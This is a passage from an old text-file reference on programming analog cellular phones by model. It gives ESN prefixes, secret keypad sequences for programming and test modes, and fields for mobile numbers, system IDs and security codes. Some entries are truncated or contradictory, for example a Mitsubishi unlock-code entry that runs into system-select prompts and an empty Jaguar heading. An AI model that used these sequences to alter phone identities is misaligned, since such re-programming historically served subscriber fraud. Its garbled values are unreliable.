    Discontinous Trans 1:  1    0 or 1
       Automatic Retry 1:  1    0 or 1

(if 2 NAMs were set, you will repeat the above steps)

           Security Code:  4    XXXX + SEND
       End-End Signaling:  1    1 + SEND
         Continuous DTMF:  1    0 or 1
          Automatic Lock:  1    0 or 1
           Announce Beep:  1    1
          Booster Option:  1    0 or 1

         New Unlock Code:  FCN + 7 + 4-digit security code (NAM)
                            + new 3-digit unlock code + CLR
           System Select:  FCN + 1 + X
                                 X=0  Standard
                                 X=1  Alternate
                                 X=2  Home
                                 X=3  Pref (A only/B only)
                                 X=4  Non-Pref (B only/A only)

Press END to write data into NAM

                                 GE STAR
                NAM Type:  Tri-State
            Manufacturer:  GE
              Programmer:  Motorola - Celnum or Curtis
          ESN Prefix DEC:  146
                     HEX:  92
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Enabled or Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

    Manufacturer Options:
        Hex Address     B7           B0
            13          0 1 0 1 0 0 0 0
            14          1 1 0 0 0 0 0 0
     Description Options:
            Adress 13 - B6 External Repertory memory
                        B4 DTMF Format
            Adress 14 - B7 Clock
                        B6 Call timer

              Horn Alert:  Press and hold END key. While holding
                            END key, depress 9. This feature does
                            not cancel when ignition is turned on.
         New Unlock code:  NAM
           System Select:  Press and hold END key. While holding
                            END key, depress 4. Use volume rocker
                            button to step through selections.
                                  0:  Pref then non-pref
                                  1:  Pref only
                                  2:  Home only
                                  3:  Preferred Roam Only
                                  4:  Non-Pref then Pref
                                  5:  Non-Pref only

                          GOLDSTAR GM/GT 5000
                NAM Type:  EEPROM
            Manufacturer:  GOLDSTAR
              Programmer:  Handset
          ESN Prefix DEC:  141
                     HEX:  8D
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  GM5000 or GT5000
      Number of Channels:  832

    Programming Sequence:  Power On
                           FCN + 4 + * (to select NAM)
      Enter Program Code:  FCN + 99 + * ("Enter Code"
                            will display) + 1234567890 + MEM
                           Code must be entered within 30 seconds
                           Mobile Number will display
                           Press MEM after entering each parameter to Store
                           Once Parameter is stored, press Scroll UP or DN
                            to view next parameter
                           Press CLR key to exit program mode WITHOUT
                            changing any parameters

                       # of digits
           Mobile Number:  10   XXX-XXX-XXXX + MEM
               System ID:  5    XXXXX + MEM
    Initial Page Channel:  3    333 or 334 + MEM
         Access Overload:  2    XX
             Unlock Code:  4    XXXX
           Security Code:  6    XXXXXX + MEM
     Theft Alarm Disable:  4    XXXX + MEM
        Preferred System:  1    0 (B) or 1 (A) + MEM
           Station Class:  1    0 + MEM
               Handsfree:  1    0 (Disable) or 1 (Enable) + MEM
               Local Use:  1    1 + MEM
              MIN Option:  1    1 + MEM
              Horn Alert:  1    1 + MEM
        Optional Speaker:  1    1 + MEM

"Save to NAM?" will display, press MEM to save NAM or CLR to exit.

              Horn Alert:  FCN + 1 + Vol UP (To Scroll)
                            "Horn Alert" will display, + * (To toggle) +
                            MEM (to store) + Turn Ignition Off
         New Unlock Code:  NAM
           System Select:  FCN + 2 + 6 digit security
                            Code + MEM + Vol UP or DOWN(to scroll) "System
                            Select" will display + * (To toggle)
                                  A  Non-wireline, B  Wireline
                                  A/B Pref non-wireline, B/A  Pref wireline
Press MEM (to store)
Press CLR (to exit)

                               GLENAYRE GL300
See AT&T 1300

                              GTE METAL SERIES
                NAM Type:  Tri-State
            Manufacturer:  Sun Moon Star
              Programmer:  Motorola 1801 - Celnum, Bytek, Curtis
          ESN Prefix DEC:  178
                     HEX:  B2
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Available Channels:  832

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX or XXXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Enabled (if equipped)
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert option:  Enabled

        System ID Format:  XXXXX
        Preferred system:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX

  Initial Paging Channel:  333 or 334
           Station Class:  08

    Manufacturer Options:
        Hex Address     B7           B0
            13          X 0 0 0 0 X X X

Hex Address 13 - B7  16-digit dial from memory if enabled
                      or 32-digit dial if 0 is entered.
                 B2  Program with 1 to enable special lock.
                 B1  Program with 1 to enable partial lock.
                 B0  Program with 1 to enable roam inhibit.

To disable any feature listed above, program bit with a zero.

              Horn alert:  F + 7
         New Unlock code:  NAM
           System Select:  F + 5 + X
                                 X=1  Standard (AB or BA)
                                 X=2  Alternative (BA or AB)
                                 X=3  Non Pref only
                                 X=4  Pref only
                                 X=5  Home

                             HARRIS 4000 SERIES
                NAM Type:  Tri-State
            Manufacturer:  Harris
              Programmer:  Motorola, Celnam, Curtis, Bytek
          ESN Prefix DEC:  137
                     HEX:  89
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Avaliable Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Enabled or Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

              Horn Alert:  Celebrity -- SEL + 0
                           CellPhone -- HORN (switch)
                              Custom -- STANDBY
         New Unlock Code:  NAM
           System Select:  Celebrity -- SEL + * + *
                           (Repeat until one of the following appears:)
                                 A Pref (AB)
                                 B Pref (BA)
                                 A Only
                                 B Only

                           CellPhone -- SEL + *  (AB)
                            SEL + #  (BA)
                            SEL + 0 + *  (A only)
                            SEL + 0 + #  (B only)

                           Custom -- Press A/B switch repeatedly.
                           One of the following will appear:
                                  A Pref  (AB)
                                  B Pref  (BA)
                                  A Only
                                  B Only
                                  H Only  (Home)

                      HITACHI CR-111H transportable
                NAM Type:  EEPROM
            Manufacturer:  Hitachi
              Programmer:  Handset
          ESN Prefix DEC:  132
                     HEX:  84
 ESN, S/N Match Required:  No
      Available Channels:  832

    Programming Sequence:  Power On
                           Select a NAM (A or B):
                           A-FCN 621# FCN, B-FCN 622# FCN
                           Enter Programming Mode
                            with FCN 626 RCL
                           Enter Data at each step
                            then press Up of Down
                           Write NAM with FCN 626 STO

                       # of digits
        System ID Format:  5    XXXXX
        Local Use Option:  1    1
              MIN Option:  1    1
       System Select H/S:  1    1
            Roam Inhibit:  1    0
           Mobile Number:  10   XXX-XXX-XXXX
           Station Class:  2    08 (mobile) or 14 (portable)
  Initial Paging Channel:  3    333 or 334
   Access Overload Class:  2    XX
        Preferred System:  1    1 (A) or 0 (B)
         Group ID Format:  2    XX
             Unlock Code:  3 or 4
    End-to-End Signaling:  1    1
               Handsfree:  1    0 or 1

              Horn Alert:  N/A
         New Unlock Code:  NAM

           System Select:  FCN + 9 + DOWN (DOWN to scroll
                            system prompts)
           Enter Options:  STO + FCN

                         HITACHI CR-2110H portable
                NAM Type:  EEPROM
            Manufacturer:  Hitachi
              Programmer:  Handset
          ESN Prefix DEC:  132
                     HEX:  84
 ESN, S/N Match Required:  No
     Handset Programming:  Yes
      Number of Channels:  666

    Programming Sequence:  Power On
                           Select NAM one or two with Sequence A or B
                           A-OPT + DIAL + MAIN (for NAM 1)
                           B-OPT + DIAL + SUB (for NAM 2)
                           (Use OPT + 3 arrow keys to select functions
                            from menu or screen)
                           Enter Programming Mode with OPT 626 RCL
                           Press UP(# Key) or Down(* Key) to increment
                           Write NAM with OPT 626 STO

                       # of digits
               System ID:  5    XXXXX
               Local Use:  1    1
              MIN Option:  1    1
  System Select from H/S:  1    1
            Roam Inhibit:  1    0
               Area Code:  3    XXX
            Phone Number:  7    XXX-XXXX
           Station Class:  2    XX
    Initial Page Channel:  4    0333 or 0334
         Access Overload:  2    XX
        Preferred System:  1    0 (B) or 1 (A)
                Group ID:  2    XX
               Lock Code:  3    XXX
    End-to-End Signaling:  1    1
               Handsfree:  1    0 or 1

Press OPT + 626 + STO to enter contents and exit program mode

              Horn Alert:  N/A
         New Unlock Code:  NAM
           System Select:  OPT + SYST (Software Ke) +
                           SCRL (Software Key) repeatedly. One of the
                           following prompts will appear:
                           SYS A/SYS B/SYS AB/SYS BA/HOME
Press SELC (Software Key to enter selection)

                   HITACHI CR-211H & CR-2121H portable
                NAM Type:  EEPROM
            Manufacturer:  Hitachi
              Programmer:  Handset
          ESN Prefix DEC:  132
                     HEX:  84
 ESN, S/N Match Required:  No
    Handset Programmable:  Yes
      Number of Channels:  832

    Programming Sequence:  Power On
                           Select NAM one or two with sequence A or B
                           A-OPT + DIAL + MAIN (for NAM 1)
                           B-OPT + DIAL + SUB (for NAM 2)
                           (Use OPT + 3 arrow keys to select functions from
                            menu or screen)
                           Enter Programming Mode with OPT 626 RCL
                           Write NAM with OPT 626 STO

                       # of digits
               System ID:  5    XXXXX
               Local Use:  1    1
              MIN Option:  1    1
  System Select from H/S:  1    1
            Roam Inhibit:  1    0
            Phone Number:  10   XXX-XXX-XXXX
           Station Class:  2    XX
    Initial Page Channel:  4    0333 or 0334
         Access Overload:  2    XX
        Preferred System:  1    0 (B) or 1 (A)
                Group ID:  2    XX
               Lock Code:  3    XXX
    End-to-End Signaling:  1    1
               Handsfree:  1    0 or 1

Press OPT + 626 + STO to enter contents and exit program mode

              Horn Alert:  N/A
         New Unlock Code:  NAM
           System Select:  OPT + SYST (Software Key) +
                           SCRL (Software Key) repeatedly. One of the
                           following prompts will appear.
                           SYS A/SYS B/SYS AB/SYS BA/HOME
Press SELC (Software Key to enter selection)

                        HITACHI CR-2110H portable
                NAM Type:  EEPROM
            Manufacturer:  Hitachi
              Programmer:  Handset
          ESN Prefix DEC:  132
                     HEX:  84
 ESN, S/N Match Required:  No

    Programming Sequence:  Power On
                           Select a NAM (A or B):
                           A-OPT + DIAL + MAIN, B-OPT + DIAL + SUB
                           (use OPT _ 3 arrow keys to sel fcns from menu)
                           Enter Programming Mode with OPT 626 RCL
                           Press UP(# Key) or DOWN(* Key) to increment
                           Write NAM with OPT 626 STO

                       # of digits
        System ID Format:  5    XXXXX
        Local Use Option:  1    1
              MIN Option:  1    1
       System Select H/S:  1    1
            Roam Inhibit:  1    0
               Area Code:  3    XXX
           Mobile Number:  7    XXX-XXXX
           Station Class:  2    08 (mobile) or 14 (portable)
  Initial Paging Channel:  3    333 or 334
   Access Overload Class:  2    XX
        Preferred System:  1    1 (A) or 0 (B)
         Group ID Format:  2    XX
             Unlock Code:  3 or 4
    End-to-End Signaling:  1    1
               Handsfree:  1    0 or 1

               Horn Aler:  N/A
         New Unlock Code:  NAM
           System Select:  OPT + SYST (software key)
                           + SCRL (software key) repeat for system
                           prompts. SELC (to enter selection)

                       HITACHI CR-111H transportable
                NAM Type:  EEPROM
            Manufacturer:  Hitachi
              Programmer:  Handset
          ESN Prefix DEC:  132
                     HEX:  84
 ESN, S/N Match Required:  No
      Available Channels:  832

    Programming Sequence:  Power On
                           Select a NAM (A or B):
                           A-OPT + DIAL + MAIN, B-OPT + DIAL + SUB
                           (Use OPT + 3 arrow keys to select from menu)
                           Enter Programming Mode with OPT 626 RCL
                           Press Up(# Key) or Down(* Key) to increment
                           Write NAM with OPT 626 STO

                       # of digits
        System ID Format:  5    XXXXX
        Local Use Option:  1    1
              MIN Option:  1    1
       System Select H/S:  1    1
            Roam Inhibit:  1    0
           Mobile Number:  10   XXX-XXX-XXXX
           Station Class:  2    08 (mobile) or 14 (portable)
  Initial Paging Channel:  3    333 oe 334
   Access Overload Class:  2    XX
             Unlock Code:  3 or 4
    End-to-End Signaling:  1    1
               Handsfree:  1    0 or 1

To enter data press OPT + 626 + STO

              Horn Alert:  N/A
         New Unlock Code:  NAM
           System Select:  OPT + SYST (software Key) +
                           SCRL (software key) repeat for system prompts.
                           SELC (to enter selection)

See NOVATEL Aurora programming instructions

See MOTOROLA Handset programming instructions
Use Handset Type SCN 2144 or SCN 2278

                         JAGUAR (Factory Phone)

                            E.F. JOHNSON
                NAM Type:  Tri-State
            Manufacturer:  E.F. Johnson
              Programmer:  Motorola or Curtis
          ESN Prefix DEC:  131
                     HEX:  83
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Available Chennels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Enabled or Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled

        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

Option Bits:
Hex Address     B7           B0
    13          1 1 1 1 0 1 1 1
    14          0 0 0 1 1 1 1 0
    15          1 1 0 0 0 0 0 0
    16          0 1 1 0 1 0 0 0

 Address 13 -- B7  One minute reminder
               B6  Call Timer
               B5  Lock Option
               B4  Speaker Mute
               B2  Local Dial Tone
               B1  Call in Absencce Indicator
               B0  Call Indicator

Address 14 -- B4  Recall Accumulated Time
              B3  Hold Option
              B2  Digit Review
              B1  DTMF Disable

Address 15 -- B7  Diagnostic Features
              B6  Failure Help Display

Address 16 -- B6  System Select Option
              B5  DTMF Repertory Dialing
              B3  System Indicator

              Horn Alert:  Horn Slide Switch on Handset
         New Unlock Code:  NAM
           System Select:  RCL + AUX + AUX, etc.
                           This will display one of the following:
                            A only

Press CLR to enter selection and exit A/B mode.

                KENWOOD KMP F500 MOBILE and KMP H700 portable
Manufacturer by NEC.
 - KMP F500 programs and operates similar to the NEC 3800.
 - KMP H700 is similar to the NEC P300
Program adaptors (available from NEC or KENWOOD) are necessary
to program both models.

See MOTOROLA Handset programming instructions.
Use Handset Type SCN 2301.

                          LUXCEL LXC/LXM/LXT 450
                NAM Type:  EEPROM
            Manufacturer:  Shintom
              Programmer:  Handset
          ESN Prefix DEC:  174
                     HEX:  AE
 ESN, S/N Match Required:  Yes
      Available Channels:  832
    Stamped Model Number:  4x130511s

    Programming Sequence:  Power On
                           FUNC + 5 + to lock phone
                           Enter Programming mode:  FUNC + # + 626 + # + FUNC
                           Press SEND to advance past Model #/sw vers
                           Press SEND to advance past ESN(in Hex form)
                           Press SEND to advance/change through parameters
                           Write NAM: END + FUNC + END
                           Phone will initialize in the Lock Mode

                       # of digits
               Area Code:  3    XXX
           Mobile Number:  7    XXX-XXX-XXXX
        System ID Format:  5    XXXXX
   Access Overload Class:  2    XX
        Local Use Option:  1    1
              MIN Option:  1    1
             Unlock Code:  3    XXX (preset 123)
               Auto Lock:  1    0(off) 1(on)
  Call Restrictions Code:  3    XXX (preset 123)
      Call counter Reset:  2    XX
               Handsfree:  1    0 or 1
              Horn Alert:  11
Horn Alert Shutoff Timer:  1    0-2hrs, 1-4hrs, 2-8hrs, 3-no limit
   Cum. Call Timer Reset:  2    XX (preset 12)

              Horn Alert:  FUNC + 4 + Ignition Off
         New Unlock Code:  NAM
           System Select:  FUNC + 7 (A then B) repeat to exit
                           FUNC + 7 (B then A) repeat to exit.

                         LUXCEL LXC/LXM/LXT 600
                NAM Type:  EEPROM
            Manufacturer:  Goldstar
              Programmer:  Handset
          ESN Prefix DEC:  141
                     HEX:  8D
 ESN, S/N Match Required:  Yes
      Available Channels:  832
    Stamped Model Number:  GM5000 or GT5000

    Programming Sequence:  Power On
                           FUNC + 4 + * (to select NAM)
                           Enter Programming mode: FCN + 99 + * (display
                            "enter code") + 1234567890 + MEM (enter within
                            30 secs) Press MEM after entering each parameter
                            to store Scroll Up or Down to view next parameter
                           CLR key to exit without changes saved

                       # of digits
           Mobile Number:  10   XXX-XXX-XXXX + MEM
        System ID Format:  5    XXXXX + MEM
  Initial Paging Channel:  3    333 or 334 + MEM
   Access Overload Class:  2    XX + MEM
             Unlock Code:  3    XXX(preset 123)
           Security Code:  6    XXXXXX + MEM
         Theft alarm dis:  4    XXXX + MEM
        Preferred System:  1    0(B) or 1(A) + MEM
               Handsfree:  1    0(disable) or 1(enable) + MEM
        Local Use Option:  1    1 + MEM
              MIN Option:  1    1 + MEM
              Horn Alert:  1    1 + MEM
        Optional Speaker:  1    1 + MEM

Press MEM to save, CLR to exit

              Horn Alert:  FCN + 1 + Vol Up (Scroll to "Horn Alert")
                           + * (toggle selection)
         New Unlock Code:  NAM
           System Select:  FCN + 2 + 6 digit security code + MEM + Vol Up
                           or Down (to scroll) ("System select") will display
                           + * (to toggle)

 Press MEM (to store)
 Press CLR (to exit)

                               MEI CT2000
                NAM Type:  EEPROM
            Manufacturer:  MEI
              Programmer:  Handset
          ESN Prefix DEC:  167
                     HEX:  A7
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  CT 3000
      Number of Channels:  832

    Programming Sequence:  Power On
  Enter program sequence:  12358 + * + 0 + #980 + #
                           Press 1 to enter program mode
                           Select NAM 1 or 2
                           Enter information for each step then press
                            * to increment
                           Press END to write NAM information or select
                           NAM 2 and repeat progress to program 2nd

                       # of digits
               System ID:  5    XXXXX + *
               Local Use:  1    1 + *
              MIN Option:  1    1 + *
           Mobile Number:  10   XXX-XXX-XXXX + *
           Station Class:  2    08 + *
    Initial Page Channel:  3   333 or 334 + *
         Access Overload:  2    XX + *
        Preferred System:  1    0 (B) or 1 (A)
                Group ID:  2    XX + *
               Lock Code:  3    XXX + *
   End-to-End Signalling:  1    1 + *
        Repertory Option:  1    1 + *
              Horn Alert:  1    1 + *
               Handsfree:  1    1 + *
                Sec Code:  3    XXX + *

Press END to write NAM information

              Horn Alert:  FCN + 9
         New Unlock Code:  NAM
           System Select:  FCN + 0 + RCL + RCL + RCL, etc...
 (Until one of the following prompts appears)
        Standard  AB or BA
        Inverse  (Alternate BA or AB)
        A Only
        B Only

Press STO to enter selection + CLR to exit.

                               MEI CT3000
                NAM Type:  EEPROM
            Manufacturer:  MEI
              Programmer:  Handset
          ESN Prefix DEC:  167
                     HEX:  A7
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  CT 3000
      Number of Channels:  832

    Programming Sequence:  Power On
  Enter program sequence:  12358 + * + 0 + # + 980 + #
                           (must be inputed within 10 seconds)
                           Press 1 to enter programming mode
                           Select NAM 1 or 2
                           Enter infomation for each step then press
                            * to increment
                           Press END to write NAM infomation or select
                           NAM 2 and repeat progress to program 2nd

                       # of digits
               System ID:  5    XXXXX + *
               Local Use:  1    1 + *
              MIN Option:  1    1 + *
           Mobile Number:  10   XXX-XXX-XXXX + *
           Station Class:  2    08 + *
    Initial Page Channel:  3    333 or 334 + *
         Access Overload:  2    XX + *
        Preferred System:  1    0 (B) or 1 (A)
                Group ID:  2    XX + *
               Lock Code:  3    XXX + *
   End-to-End Signalling:  1    1 + *
        Repertory Option:  1    1 + *
              Horn Alert:  1    1 + *
               Handsfree:  1    1 + *
                Sec Code:  1    1 + *

Press END to write NAM information

              Horn Alert:  FCN + 9
         New Unlock Code:  NAM
           System Select:  FCN + 0 + RCL + RCL + RCL, etc...

(Until one of the following prompts appears)
        Standard  (AB or BA)
        Inverse  Alternate (BA or AB)
        A Only
        B Olny

Press STO to enter selection + CLR to exit.

                            MEI HT5000 portable
                NAM Type:  EEPROM
            Manufacturer:  MEI
              Programmer:  Keypad
          ESN Prefix DEC:  167
                     HEX:  A7
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  HT 5000
      Number of Channels:  832

    Programming Sequence:  Fully charges battery on phone
                           Power On
                           Connect program adapter to bottom of phone or
                            jumper pin #1 and pin #5 while pressing PWR button
                           Enter individual parameter then press RCL to store
                            data and increment
                           SND or MUT may be pressed to scroll program parameters
                           Press END to write NAM information

                       # of digits
   System Select Feature:  1    1 + RCL
       Low Battery Alarm:  1    1 + RCL
        Memory Locations:  1    0=10 or 1=100 + RCL
          Enable Roaming:  1    1 + RCL
   End-to-End Signalling:  1    1 + RCL
              Horn Alert:  1    1 + RCL
        Repertory Option:  1    1 + RCL
           Music on Mute:  1    1 + RCL
      Enable Timer Reset:  1    1 + RCL
            Status Meter:  1    1 + RCL
                Not Used:  1    0 + RCL
        Resettable Timer:  1    0 + RCL
Restrict own Num Display:  1    0 + RCL
                Not Used:  1    0 + RCL
                Not Used:  1    0 + RCL
                Not used:  1    0 + RCL
             Lock Select:  1    0=Total lock, 1=Outgoing Lock,
                                2=Partial Lock + RCL
             Unlock Code:  1-10 XXX + RCL
         Backlight Timer:  256  10 + RCL
           Mobile Number:  10   XXX-XXX-XXXX + RCL
               System ID:  5    XXXXX + RCL
  Initial Paging Channel:  3    333 or 334 + RCL
           Station Class:  2    10 + RCL
        Preferred System:  1    1(A) or 0(B) + RCL
              MIN Option:  1    X + RCL
         Access Overload:  2    XX + RCL
                Group ID:  2    XX + RCL
               Local Use:  1    1 + RCL

The program sequence will now repeat the last 8 steps for a second NAM.
If you wish to program only one NAM, press END to exit. Once end is pressed,
wait 5 seconds, for the phone to complete the program process. After the
programming is complete, power phone OFF and remove the program adapter.

     Multiple NAM Select:  RCL + # + 6 (repeatedly until new
                           number and correct system select appears)
         New Unlock Code:  NAM
           System Select:  RCL + # + 6 + 6 + 6 + 6 etc...
(One of the following prompts will display)
        Standard (AB or BA)
        Inverted (Alternate BA or AB)
        A only
        B only

Press CLR to exit.


                              MGA TELEPHONES

                     MITSUBISHI 500, 555, 560 and 600
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  Handset
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  Yes
      Number of Channels:  666

    Programming Sequence:  Power On
                           Press and hold STO while inputting 5474432
                           Enter data then press SND to increment
                           Press END to write NAM information

                       # of digits
           Mobile Number:  10   XXX-XXX-XXXX + SND
           Security Code:  3    XXX + SND
               System ID:  5    XXXXX + SND
               Local Use:  1    1 + SND
              MIN Option:  1    1 + SND
  Initial Paging Channel:  3    333 or 334 + SND
         Access Overload:  2    XX + SND
        Preferred System:  1    0(B) or 1(A) + SND
                Group ID:  2    XX + SND
   End-to-End Signalling:  1    1 + SND
               Handsfree:  1    0 (disable) or 1 (Enable) + SND
            Roam Inhibit:  1    0 (disable) or 1 (Enable) + SND
              A/B Select:  1    0 (disable) or 1 (Enable) + SND
            Dual Handset:  2    00 single set + SND
                                01 dual handset + SND
   Long Distance Inhibit:  2    00 standard + SND
                                08 inhibit + SND

The phone alson has a NAM socket. Be sure to remove standard NAM, if
applicable, before attempting to program phone from the handset.

              Horn Alert:  FCN + 5

5 can be repeatedly pressed to exted horn alert duration. If "Horn" blinks
then call in absence is activated.

         New Unlock Code:  FCN + 6 + 3 digit security code (NAM) +
                           new 3 digit unlock code.
           System Select:  FCN + 0 + 0 + 0 etc... (until one of the
                           following prompts appears)
                                 Pref A or Pref B
                                 Pref B or Pref A
                                 H only
                                 Only A or Only B
                                 Only B or Only A

Press CLR to exit.

                          MITSUBISHI 700 portable
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  Handset
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
    Stamped Model Number:  MT392FOR6A
      Number of Channels:  666

    Programming Sequence:  Power On
                           Enter Sequence 3111917 while holding CLR
                           (within 10 seconds of power on)
                           SEND button Enters data and increments
                           END button writes data in NAM

                       # of digits
           Mobile Number:  10   XXX-XXX-XXXX + SEND
           Security Code:  4    XXXX + SEND
               System ID:  5    XXXXX + SEND
               Local Use:  1    1 + SEND
              MIN Option:  1    1 + SEND
    Initial Page Channel:  3    333 or 334 + SEND
         Access Overload:  2    XX + SEND
        Preferred System:  1    0(B) or 1(A) + SEND
                Group ID:  2    XX + SEND
   End-to-End Signalling:  1    1 + SEND
            Roam Inhibit:  1    0 or 1 + SEND
       Enable A/B Option:  1    0 or 1 + SEND
               Auto Lock:  1    0 or 1 + SEND
   Enable Booster Option:  1    0 or 1 + SEND

Press END to write NAM information

         New Unlock Code:  FCN + STO + (4 digit Security Code) +
                           New 3 digit Unlock Code + CLR + FCN +
                           1 + X + CLR (to exit)
                                  X=0  Standard (AB or BA)
                                  X=1  Alternate (BA or AB)
                                  X=2  Home only
                                  X=3  Preferred only (A only or B only)
                                  X=4  Non-Pref Only (B only or A only)

                    MITSUBISHI 800 transportable & mobile
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  Handset
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
      Number of Channels:  832

    Programming Sequence:  Power On
                           Depress and hold STO while nputting 5474432
                           (must be input within 10 seconds)
                           Enter information for each step then press
                            SND to increment
                           Press END to write NAM information

                       # of digits
       Dual Phone Number:  1    0 (1 number) or 1 (2 number)
           Mobile Number:  10   XXX-XXX-XXXX
               System ID:  5    XXXXX
               Local Use:  1    1
              MIN Option:  1    1
    Initial Page Channel:  4    0333 or 0334
         Access Overload:  2    XX
        Preferred System:  1    0(B) or 1(A)
                Group ID:  2    XX

(If 2 Numbers were set, repeat the above functions once more)

           Security Code:  4    XXXX
   End-to-End Signalling:  1    1
            Transmission:  1    0(disable) or 1(enable)
               Handsfree:  1    0(disable) or 1(enable)
            Roam Inhibit:  1    0
         Continuous DTMF:  1    0(disable) or 1(enable)
           System Select:  1    1
            Dual Handset:  1    0(disable) or 1(enable)
   Long Distance Inhibit:  1    0(disable) or 1(enable)

Never Power Off or Disconnect power while phone is in programming mode.

             Display ESN:  Enter Test Mode
                           Power On
                           Press and hold STO while inputting 5278764
                           Enter 189 + SND (to read ESN)
                           Power off to exit

              Horn Alert:  FCN + 5 pressing 5 repeatedly will increase
                           horn alert duration. If "Horn" stays illuminated,
                           phone is in horn alert mode. If "Horn" blinks, the
                           call in absence indicator is activated.

         New Unlock Code:  FCN + 6 + 4 digit security code (NAM) +
                           following prompts appears
                                  Pref A or Pref B, Standard (AB or BA)
                                  Pref B or Pref A, Alternate (BA or AB)
                                  Home only
                                  Only A or Only B
                                  Only A or Only A

Press CLR to exit.

                     MITSUBISHI 900 & 3000 portables
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  Handset
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
      Available Channels:  832

    Programming Sequence:  Power On
                           Depress and hold END while inputting 6972814
                           (must be input within 10 seconds)
                           Enter information for each step then press
                            SEND to increment
                           Press END to write NAM information

                       # of Digits
             Dual Number:  1    0(1 NAM) or 1(2 NAM) + SEND
           Mobile Number:  10   XXX-XXX-XXXX + SEND
               System ID:  5    XXXXX + SEND
               Local Use:  1    1 + SEND
              MIN Option:  1    1 + SEND
    Initial Page Channel:  4    0333 or 0334 + SEND
         Access Overload:  2    XX + SEND
        Preferred System:  1    0(B) or 1(A) + SEND
                Group ID:  2    XX + SEND
            Roam Inhibit:  1    0 + SEND
                     VOX:  1    0(disable) or 1(enable) + SEND

(if you entered 2 NAMs repeat the above steps once more)

           Security Code:  4    XXXX + SEND (900 only)
   End-to-End Signalling:  1    1 + SEND
         Continuous DTMF:  1    0(disable) or 1(enable) + SEND
               Auto Lock:  1    0(disable) or 1(enable) + SEND
                 Booster:  1    0 + SEND (900 only)
           Audible Timer:  1    0(disable) or 1(enable) + SEND

Use a charged battery for programming.
Do NOT power down or disconnect power while in the programming mode.

             Display ESN:  Power On
                           Hold END key while inputting 0944635 (within 10 secs)
                            18 + SEND (to display ESN)
                           Power Off (to exit)

         New Unlock Code:  FCN + 7 + 4 digit security code
                           (NAM) + New 3 digit unlock code + CLR  (900 only)
                For 3000:  FCN + 7 + 4 digit security code (NAM)
                           + new 3 digit unlock code + STO

           System Select:  FCN + 1 + X
                                 X=0  Standard (AB or BA)
                                 X=1  Alternate (BA or AB)
                                 X=2  Home
                                 X=3  Pref Only (A only or B only)
                                 X=4  Non-Pref Only (B only/A only)

Press CLR to exit

                  MITSUBISHI 1500 transportable & mobile
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  Handset
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
    Stamped Model Number:  1500+Serial Number
      Number of Channels:  832

    Programming Sequence:  Power On
                           Depress and Hold CLR while inputting 5474432
                            (must be within 10 seconds)
                           Enter information for each step then press
                            SND to increment
                           Press END to write NAM information

                       # of Digits
       Dual Phone Number:  1    0 (1 NAM) or 1 (2 NAMs) + SND
           Mobile Number:  10   XXX-XXX-XXXX + SND
               System ID:  5    XXXXX + SND
               Local Use:  1    1 + SND
              MIN Option:  1    1 + SND
    Initial Page Channel:  4    0333 or 0334 + SND
         Access Overload:  2    XX + SND
                Group ID:  2    XX + SND

 (If you selected 2 NAMs you will repeat the above steps once more)

           Security Code:  4    XXXX + SND
            Transmission:  1    0(disable) or 1(enable) + SND
            Roam Inhibit:  1    0 + SND
         Continuous DTMF:  1    0(disable) or 1(enable) + SND
           System Select:  1    1 + SND
Disable One Tel #
                 display:  1    0 + SND
SID Lockout (Invalid
                    SID):  5    XXXXX + SND
            Dual Handset:  1    0(disable) or 1(enable) + SND
            RJ 11 Option:  1    0(disable) or 1(enable) + SND

Press END key to enter program info and exit program mode

NEVER Power Off or Disconnect power while phone is in programming mode

            Display ESN:  Enter Test Mode
                          Power On
                          Press and hold CLR while inputting 5287864
                          Enter 18 + SND(to read ESN)
                          Power Off to exit.

             Horn Alert:  FCN + 3 + 8
        New Unlock Code:  FCN + 7 + 4 digit security code + New
                          3 digit unlock code + STO
          System Select:  FCN + 1 + X
                            X=0  Prefer A (AB)
                            X=1  Prefer B (BA)
